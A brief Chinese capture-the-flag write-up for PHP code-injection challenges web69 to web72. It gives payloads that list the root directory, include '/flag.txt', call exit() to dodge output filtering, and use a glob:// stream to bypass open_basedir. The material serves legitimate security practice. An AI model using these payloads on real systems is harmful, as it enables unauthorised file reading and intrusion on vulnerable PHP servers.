web69+70
c=var_export(scandir('/'));查看目录,c=include('/flag.txt');得到flag
web71
查看附件源码,在执行完命令后,会将页面字符替换为?,只需执行完命令立刻退出即可
c=var_export(scandir('/'));exit();查看目录,c=include('/flag.txt');exit();得到flag,或者使用die();
web72
受到open_basedir 限制:可将用户访问文件的活动范围限制在指定的区域
使用glob协议绕过查看目录
c=$a="glob:///*.txt";#查看根目录中的*.txt文件
if($b = opendir($a)){
while(($file=readdir($b))!==false){
echo"filename:".$file."\\n";
}
closedir($b);
}
exit();
相关知识:PHP伪协议总结 - A2rcher_zjh - 博客园
web,abc,addr,leak,write,web69,77,base,txt From: https://blog.csdn.net/2301_80362341/article/details/145323110